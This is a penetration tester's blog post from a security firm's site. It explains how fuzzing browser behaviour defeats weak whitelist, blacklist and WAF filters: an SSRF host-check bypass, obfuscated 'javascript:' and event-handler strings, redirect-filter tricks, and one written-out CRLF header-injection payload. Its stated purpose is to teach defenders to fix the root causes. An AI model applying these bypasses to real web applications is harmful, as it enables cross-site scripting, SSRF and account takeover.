“We needed to find solutions to a variety of issues whilst being a complex business, operating in a 24/7 environment. Stripe OLT listened and understood immediately the challenges we faced.”

IT Operations Manager
Simon Darley
Trusted by industry leaders

Let's Talk

Call us on one of the numbers below, we cover the whole of the UK.

BriSTOL HQ & The South West

+44 (0) 117 974 5179

London & Surrounding Areas

+44 (0) 207 043 7044

Manchester & the North West

+44 (0) 161 399 1305

“We needed to find solutions to a variety of issues whilst being a complex business, operating in a 24/7 environment. Stripe OLT listened and understood immediately the challenges we faced.”

IT Operations Manager
Simon Darley
Trusted by industry leaders

Request a Call-back.

First we need a few details.

Contact Form Primary popup

Keep up to date with the experts

Get insights direct to your email inbox

NEWSLETTER - Exit Intent

Follow us on social

“We needed to find solutions to a variety of issues whilst being a complex business, operating in a 24/7 environment. Stripe OLT listened and understood immediately the challenges we faced.”

IT Operations Manager
Simon Darley
Trusted by industry leaders

Request a Call

First we need a few details.

Contact Form Primary popup
Expert Intel

The importance of proper filtering within web applications

Published: February 2, 2024
Updated: February 05, 2024
Expert: Toby Davenport
Role: Penetration Tester
Specialises in: Offensive Security
What you will learn:
For those that have a technical understanding of offensive cyber security TTPs, and want to know more about the importance of proper filtering within web applications, this intel is one for you.
Throughout the assessment of countless web applications, one thing has become apparent to me, web applications often rely too heavily on whitelists and blacklists alongside weak regex filters, and this can be dangerous...

Special thanks to Gareth Heyes for the work “JavaScript for Hackers” which provided much value.

Many times, during software security testing (penetration tests), whitelisting and blacklisting are encountered, with testers trying to bypass the regex (regular expression), but what is the actual process of identifying these characters that can bypass filters? How are new payloads formed? How are Web application Firewalls bypassed? It is not a case of just throwing and seeing what sticks. Browser behaviour is fuzzed.

Throughout the assessment of countless web applications, one thing has become apparent, web applications often rely too heavily on whitelists and blacklists alongside weak regex filters. This can be dangerous. And can lead the way for client-side attacks, as well as server-side attacks such as Server Side Request Forgery.

Client attacks can be devastating for users of an application. In severe cases, client-side attacks can lead to full cookie and session retrieval for a malicious user to take over accounts on the application. In cases where cookies/sessions are secure, client-side attacks can be used to have a victim perform actions on an attacker’s behalf, such as changing associated passwords and email addresses on an application, even if further protection such as cross-site request forgery tokens are in place (if they are referenced within the application DOM).

Server-side attacks are far more exciting for a malicious user, Server-side Side Request Forgery or SSRF for short, exploitation can lead to full compromise of cloud and internal environments.

What does whitelisting and blacklisting have to do with any of this and what is fuzzing and fuzz testing?

Fuzzing(or fuzz testing) is the process of emulating how input structure is handled by an application or browser. Fuzzing browser behaviour can lead to characters being identified that lead the browser to behave in certain ways that could impact application filters. In short, fuzzing can be used to identify what input data can be inserted between characters of a word, to break up the word filter, without having an impact on how the string is rendered.

Web applications try to limit the input a user can enter, this is an attempt to stop malicious “payloads” being utilised on the application. But what happens when this is not thoroughly implemented?

A live example of weak whitelisting was seen on the DJANGO backend handling of whitelisting, referenced under 

CVE 2023-40017

Applications have different elements, which make up the whole application, the front end, the backend, and the browser behaviour in which the application is launched.  Browser behaviour is a huge element of web exploitation. Browser behaviour can be fuzzed to see how input is handled by application logic and browsers.

For instance, an example web application implements a proxy, this proxy allows the web application to make a request to a backend application to retrieve images, the endpoint can be seen below:

The application performs a check to ensure “goodhost.host” is within each request to the endpoint.

The below request:

would fail this check and return a 500 response. Browser behaviour can be fuzzed and exploited to break the whitelist, tricking what input passes through the front end to the backend.

returns a 500 response

returns a 500 response.

What now?

We need to think about what behaviour a browser can display that will pass the check being made by the application. The check ensures goodhost.host being present and being the host that the browser sends the request to. 

We will want to check characters that cut the request, in this case, the below request will do the trick:

Browser behaviour when fuzzed, decodes %5c to \ and instructs that only the first host is requested. Whereas, the whitelist thinks the requested host is goodhost.host. The # cuts the host off in the browser request.

In some browsers, \ would be treated as / bypassing this whitelisting. This can all be identified through JavaScript fuzzing, to identify what characters will pass the whitelist and make a request to the evil host.

A web application that fails to sanitise HTML input, but strictly performs a blacklist on “any” malicious strings, for instance javascript: will trigger a Web Application Firewall (WAF) and deny the request.

Fuzz testing can be used in different browsers to see what character codes can be used before, after, or in the middle of words, to create a different string that is ignored but triggers the original payload, passing the WAF.

Fuzz tests in the Chrome browser can be used to identify multiple character codes that can be encoded to hex equivalents and placed before or after strings, still functioning as the unmodified string.

The below image shows a string that will still function as “javascript:”, passing a blacklist.

The character codes displayed below are relevant to the Chrome browser, each character code can be encoded in Hex, HTML or Unicode to break up a blacklisted word.

This can also be combined with multiple encodings, such as HTML5 Entities, to bypass different blacklists. In many cases a WAF will search for “:” and block a payload, the below image identifies the payload that would pass the filter, using an alternative encoding to :

The same can be displayed for event handlers. Fuzz testing what characters can be placed before or after an event handler to have it still execute its function.

As the image below shows, the real event handler is rendered, but the above image shows / is rendered before the word, passing a blacklist filter for the event handler.

This would bypass the “onmouseover” blacklist.

Another example would be shown in the way an application handles re-directs. For example, a WAF is looking for a strict https schema which can also be referenced as “//”. The application does not want external hosts being referenced within // and is strictly looking for “//”. However, we can fuzz across different browsers what characters can be placed between /$/, inserting characters replacing “$” to have the payload operate as the original “//” requesting the hostname. The below image shows multiple character codes that can be encoded within /$/ to still function as //, bypassing the “//” blacklist.

If this filter is needed to meet the condition of a whitelisted host, we can throw in a ? Or # or URL encoded representations before the 2nd domain.

Many times, whitelists do not check the placement of the decimal (.). For example, whitelist.uk validates the wording but does not have strict regex or length validation. White.list.uk could bypass this filter. Many times, working backwards yields good results. The same can be used if the payload is placed within a location header to break out the header, create a new header and introduce Cross Site Scripting through Carriage Return Line Feeds, %E5%98%8A%E5%98%8Dlocation:notwhite.list.com.

Web Application Firewalls can be bypassed by fuzzing how browsers handle whitespace input to breakup wording, translating the wording back to its original format within a payload. A range of values can be identified across browsers, these character codes identify characters that had no impact on the evaluation of the string.

The below demonstrates multiple fuzzed characters that are ignored, but break up the blacklisted word “window.location” bypassing the filter. As demonstrated, the javascript is still evaluated and functions as intended with the fuzzed characters breaking up filtered strings.

This can be bypassed to defeat whatever the filter is looking for.

In conclusion, it is possible to see that relying on whitelisting and blacklisting is not an effective measure of protection for Web Applications. A Web Application firewall should never be solely relied on. Does this mean a WAF is not worthwhile? No, not at all, but it means issues should be addressed at the root cause, instead of putting protective measures in front of the weakness especially when it comes to client-side issues as browsers can exhibit different behaviours that can be exploited to bypass protective measures. Issues such as cross-site scripting should never be overlooked, even if authentication sessions are protected from JavaScript. If a malicious user can control the source JavaScript, they can have users perform unauthorised actions, which depending on the application, can still lead to account takeover issues, or actions from one application interacting with another across the same origin, issuing malicious requests.


Take a proactive approach to protecting your digital assets, get in touch about our award-winning Security Operations Centre.

Our latest expert Intel

  • March 27, 2024
    Read full article
  • Gootkit
    March 7, 2024
    Read full article
  • February 5, 2024
    Read full article
  • Malvertising
    December 20, 2023
    Read full article
  • Microsoft Ignite
    January 19, 2024
    Read full article
  • keys
    January 19, 2024
    Read full article
  • December 19, 2023
    Read full article
  • CVE-2023-42439
    November 9, 2023
    Read full article
  • password
    September 11, 2023
    Read full article
  • November 24, 2023
    Read full article
  • August 1, 2023
    Read full article
  • July 27, 2023
    Read full article